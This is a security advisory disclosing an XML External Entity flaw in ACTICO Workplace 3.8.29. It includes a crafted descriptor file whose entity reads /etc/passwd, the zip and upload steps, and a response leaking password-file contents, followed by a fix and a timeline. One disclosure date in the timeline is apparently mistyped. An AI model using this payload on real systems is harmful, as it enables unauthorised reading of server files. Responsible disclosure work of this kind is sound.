#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Workplace
# Vendor:   Actico
# CSNC ID:  CSNC-2022-017
# Subject:  XML External Entity Attack
# Severity: High
# Effect:   XML External Entity Attack
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:     2023-01-16
#
#############################################################

Introduction
------------

The ACTICO Workplace framework allows organizations to create flexible,
workflow-based business applications that involve end users into the
decision-making process. [1]

During a penetration test, it was found that uploaded files are not
parsed in a secure manner leading to an XML External Entity Attack (XXE),
which allows an attacker to read all files on the system the application
has access to.


Affected
--------

Vulnerable:
 * ACTICO Workplace 3.8.29 (older versions might be affected as well)

Technical Description
---------------------

Rules models can be provided by uploading vra files (which are zip files)
containing jar files as well as a description file named
rulearchive.vs1.descriptor, listing all files stored within the vra file.
A manipulated version of this file can look like this:
$ cat rulearchive.vs1.descriptor
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<RuleArchiveDescriptor version="1">
  <containedArtifacts>
    <artifact>
      <identifier class="">
        <groupId>com.act'ico.cbg.rulemodels</groupId>
        <artifactId>CBG_Client_Platform_Configuration</artifactId>
        <version>3.8.26-M-R03</version>
      </identifier>
      <entry>&xxe;</entry>
    </artifact>
  </containedArtifacts>
</RuleArchiveDescriptor>

This file is then zipped as vra:
$ zip test.vra rulearchive.vs1.descriptor

Now, test.vra can be uploaded as a rule model, leading to the file /etc/passwd
being posted as error message.
Request:
POST /[CUT BY COMPASS] HTTP/1.1
Host: [CUT BY COMPASS]
Cookie: [CUT BY COMPASS]
[CUT BY COMPASS]Connection: close

-----------------------------111813045333478463073096332197
Content-Disposition: form-data; name="file"; filename="test.vra"
Content-Type: application/octet-stream
PK[CUT BY COMPASS]

Response:

HTTP/1.1 200 
[CUT BY COMPASS]
Content-Type: text/xml;charset=UTF-8 
Connection: close 
[CUT BY COMPASS]
Server: server 
Content-Length: 1717 

[CUT BY COMPASS]
<i class="fas fa-fw fa-times-circle x-level-error"></i>
<span>There is no file, which can be used to read the contents for
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
[CUT BY COMPASS]
dbus:x:81:81:System message bus:/:/sbin/nologin
app:x:1000:1000::/home/app:/bin/bash</span>
[CUT BY COMPASS]
</ajax-response> 


Vulnerability Classification
----------------------------

CVSS v3.1 Metrics:
- CVSS Base Score: 7.6 (High)
- CVSS Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L


Workaround / Fix
----------------

The XML parser should be configured to deny external entities.


Timeline
--------

2022-11-24: Vulnerability discovered
2022-11-25: Informed developer about the vulnerability
2023-01-16: Developer fixed the vulnerability
2022-01-16: Coordinated public disclosure


References
----------

[1] https://cdn.actico.com/wp-3f76a-content/uploads/2020/10/26170110/201023_DataSheet_Platform9_EN.pdf